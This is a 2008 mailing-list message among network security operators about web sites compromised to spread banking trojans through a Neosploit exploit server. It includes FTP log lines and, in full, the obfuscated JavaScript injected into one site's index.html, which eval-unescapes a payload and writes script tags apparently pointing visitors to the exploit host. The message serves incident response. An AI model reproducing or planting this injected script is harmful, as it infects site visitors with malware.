[nsp-sec] ack Re: probably compromised web sites

Jon Lewis jlewis at lewis.org
Wed Mar 19 10:26:36 EDT 2008 

On Wed, 19 Mar 2008, Tom Fischer wrote:

> ----------- nsp-security Confidential --------
>
> Hi,
>
> attached a list of probably compromised web sites.
>
> This list is based on referer stats of a Neosploit
> server - which is used to spread Torpig/Anserin/Hupigon/Sinowal/...
> which btw. uses a new MBR rootkit which is currently not detected
> by GMER or Symantec Mebroot tool :-(
>
> The compromised sites usually contains obfuscated javascript which leads
> to hhipthr.com/cgi-bin/mail.cgi (208.101.34.10 (Softlayer))

> 6364 | 209.208.50.128  | hxxp://www.soft-fetish.com/

It looks like this site's maintainer's login/passwd was compromised,
the main index.html downloaded, javascript added, and uploaded.

Tue Mar 11 07:24:20 2008 1 24.93.206.77 1562 /index.html b _ o r soft-fetish
ftp 0 * c
Tue Mar 11 07:24:45 2008 6 24.93.206.77 4821 /index.html b _ i r soft-fetish
ftp 0 * c

I'm in kind of a hurry to get a road trip started, so I haven't bothered
decoding this yet...but here's the javascript code that was added.

$="%63b%3d%22%2528d%2573)%253bst%253dtm%2570%253d%
2527%2527;for%2528%2569%253d0;%2569%253cds.%25%22;cu%3d%22(p}b4g
xq)6b}g}v}x}
.|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%25$$4|q}s|),$*(;}rfuyq*(
;p}b*%22;op%3d%22%2524%253d%2522%2564w%2528%2564cs(%2563u,%2531%2534))%253b%2522
;%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t
7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4
%3ebu|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cc%3d%226
cen%2567t%2568;i%252b+){%2574mp%253dds%252e%2573l%2569ce%2528i,i%252b%2531)%25%2
2;ce%3d%222e%2563har%2543ode%2541%2574(0%2529^(%25270%25780%2530%2527+es)%2529%2
529;}}%22;cz%3d%22%2566un%2563ti%256fn%2520%2563z(c%257a){r%2565t%2575rn%2520c%2
561%252b%2563b+%2563c+c%2564%252bc%2565%252bc%257a;%257d;%22;st%3d%22%2573t%253d
%2522$%253ds%2574%253bd%2563%2573%2528d%2561%252b%2564b%252b%2564%2563+%2564%256
4+%2564%2565%252c%2531%2530%2529;%2564%2577(%2573t%2529;%2573t%253d%2524%253b%25
22%253b%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c
%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7
i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi8
9;%25229+u|cu%22;cd%3d%223b%2573t%253dst%252bSt%2572i%256eg%252efr%256fmC%2568ar
%2543od%2565((%2574mp%25%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3
c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~
ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3
c7}7%3c7~7%3c7%257F7%3c73c7a7%3c7b7%3c7c7%3c7%22;dz%3d%22%2566u%256ecti%256f%
256e%2520%2564w(t%2529{c%2561%253d%2527%252564o%252563u%25256den%252574%252ew%25
2572%2569%2525%25374e%252528%25252%2532%2527;%2563%2565%253d%2527%252522)%2527;c
%2562%253d%2527%25253c%252573c%2572%2569%252570%25257%2534
l%2561%25256egu%25256
1%2567%252565%25253d%25255c%252522j%2561va%2573cr%252569%252570%2574%25255c%2525
%2532%2532%25253e%2527;cc%253d%2527%25253c%25255c%25252fsc%252572i%25257%2530t%2
5253e%2527;ev%2561l%2528%2575n%2565sca%2570e%2528t)%2529};%22;ca%3d%22%2566u%256
ec%2574%2569o%256e
dc%2573(%2564s,%2565%2573){d%2573%253dunes%2563ape%22;dd%3d%2
2}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^
}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%25
22&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;dc%3d%220d)K7
t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud
]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b
+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;%69f
%28%64o%63ume%6e%7
4%2ecoo%6bie%2ei%6e%64e%78%4ff(%27vbu%6cl%65ti%6e_mu%6cti%71%75%6fte%3d%27)%3d%3
d-1){sc(%27v%62%75lle%74in_%6dult%69%71u%6ft%65%3d%27,2,%37)%3bev%61%6c(u%6e%65s
ca%70%65%28%64z%2b%63z+%6f%70%2bst)%2b%27d%77(dz%2bcz(%24+%73t)%29;%27)}%65lse%7
b$%3d%27%27};func%74%69on %73c(c%6em%2cv,e%64){%76ar%20e%78d%3dnew
%44%61te%28);
e%78d%2eset%44ate%28e%78d.g%65t%44ate%28)+%65d)%3bdo%63u%6dent%2eco%6fk%69e%3dcn
%6d%2b%20%27%3d%27
+esc%61pe%28%76)%2b%27;ex%70ir%65s%3d%27+ex%64.t%6fGM%54St%72
i%6eg()%3b};";eval(unescape($));document.write($);

----------------------------------------------------------------------
  Jon Lewis                   |  I route
  Senior Network Engineer     |  therefore you are
  Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

More information about the nsp-security mailing list